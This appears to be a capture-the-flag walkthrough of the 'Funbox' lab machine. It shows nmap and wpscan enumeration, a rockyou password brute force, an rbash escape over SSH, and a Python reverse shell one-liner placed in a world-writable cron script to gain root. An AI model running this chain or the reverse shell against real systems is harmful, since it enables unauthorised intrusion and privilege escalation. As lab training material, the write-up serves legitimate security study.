IP of the target : 192.168.1.13
As usual I started with nmap scan to find open ports and services using the command show below :
nmap -sC -sV -Pn -p- -T4 --max-rate=1000 -o nmap.txt 192.168.1.13 Nmap scan report for funbox.lan (192.168.1.13) Host is up (0.0014s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 80/tcp open ssl/http Apache/2.4.41 (Ubuntu) |_http-generator: WordPress 5.4.2 | http-robots.txt: 1 disallowed entry |_/secret/ |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Funbox – Have fun…. 33060/tcp open mysqlx? | fingerprint-strings: | DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: | Invalid message" |_ HY000
Port 21/FTP , 22/SSH , 80/HTTP and 3306/mysql are open, anonymous login is not allowed for FTP so lets move forward on port 80, opening it in browser gives an error "funbox.fritz.box’s server IP address could not be found." So I solved this problem by editing the /etc/hosts file as:
192.168.1.13 funbox.fritz.box # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters
Now I can access the web application and by looking at the theme I was sure that this is "Just another wordpress website", so I started enumeration using wpscan.
┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1] └──╼ $wpscan --url "http://funbox.fritz.box/" --enumerate u,vp . . . [i] User(s) Identified: [+] admin | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Wp Json Api (Aggressive Detection) | - http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] joe | Found By: Author Id Brute Forcing - Author Pattern
So I have two usernames, next step is to bruteforce the password against these users using the wordlist rockyou.txt.
┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1] └──╼ $wpscan --url "http://funbox.fritz.box/" --passwords ../../rockyou.txt . . . [+] Performing password attack on Wp Login against 2 user/s [SUCCESS] - joe / 12345 [SUCCESS] - admin / iubire Trying admin / iubire Time: 00:00:12 < > (670 / 14344394) 0.00% ETA: ??:??:?? [!] Valid Combinations Found: | Username: joe, Password: 12345 | Username: admin, Password: iubire
That's it, we found the password of admin user, we can login into admin panel and from there we can pop a reverse shell as user www-data, but wait, here I thought to use these credentials for SSH login and yes I was in as user joe.
┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1] └──╼ $ssh firstname.lastname@example.org email@example.com's password: Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
umm that's nice , now I started enumerating different directories but I was unable to change directory and cd /home command gives me an error -rbash: cd: restricted and we have many ways to bypass this.
┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1] └──╼ $ssh firstname.lastname@example.org -t "bash --noprofile" email@example.com's password: joe@funbox:~$ cd /home joe@funbox:/home$
After some enumeration I found interesting file in /home/funny/ directory.
joe@funbox:/home/funny$ ls -al total 47608 drwxr-xr-x 3 funny funny 4096 Jul 18 10:02 . drwxr-xr-x 4 root root 4096 Jun 19 11:50 .. **-rwxrwxrwx 1 funny funny 55 Jul 18 10:15 .backup.sh** -rw------- 1 funny funny 1462 Jul 18 10:07 .bash_history -rw-r--r-- 1 funny funny 220 Feb 25 2020 .bash_logout -rw-r--r-- 1 funny funny 3771 Feb 25 2020 .bashrc drwx------ 2 funny funny 4096 Jun 19 10:43 .cache -rw-rw-r-- 1 funny funny 48701440 Sep 21 08:42 html.tar -rw-r--r-- 1 funny funny 807 Feb 25 2020 .profile **-rw-rw-r-- 1 funny funny 162 Jun 19 14:13 .reminder.sh** -rw-rw-r-- 1 funny funny 74 Jun 19 12:25 .selected_editor -rw-r--r-- 1 funny funny 0 Jun 19 10:44 .sudo_as_admin_successful -rw------- 1 funny funny 7791 Jul 18 10:02 .viminfo joe@funbox:/home/funny$ cat .reminder.sh #!/bin/bash echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" joe@funbox joe@funbox:/home/funny$
This message clearly means that .backup.sh is running as user funny, So in the next step I simply edited the .backup.sh file with a reverse shell.
joe@funbox:/home/funny$ cat .backup.sh python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.103",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
After waiting for some time I got access to funny user's shell, after some more enumeration I couldn't find anything to get root access, So I terminated the current reverse shell and started to listen again on the same port, but this time I got shell of root user.
┌─[m4g1c14n@parrot]─[~] └──╼ $nc -nvlp 1234 listening on [any] 1234 ... connect to [192.168.1.103] from (UNKNOWN) [192.168.1.13] 37192 /bin/sh: 0: can't access tty; job control turned off $ id uid=1000(funny) gid=1000(funny) groups=1000(funny),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd) $ exit
Listening again on same port:
┌─[m4g1c14n@parrot]─[~] └──╼ $nc -nvlp 1234 listening on [any] 1234 ... connect to [192.168.1.103] from (UNKNOWN) [192.168.1.13] 37194 /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root) # cat /root/flag.txt Great ! You did it... FUNBOX - made by @0815R2d2
And here is the actual catch of this machine.
NOTE : .backup.sh file is running as cronjob, and after gaining root access , I checked the cronjob for both the users ( funny and root) and found this thing:
This is for user funny:
root@funbox:~# crontab -u funny -l . . . */2 * * * * /home/funny/.backup.sh
For user root:
root@funbox:~# crontab -u root -l . . . */5 * * * * /home/funny/.backup.sh
So that's the reason I got root shell by listening on the same port after some time . I hope you like the walkthrough :)
NOTE: The awesome artwork used in this article was created by Anton Fritsler.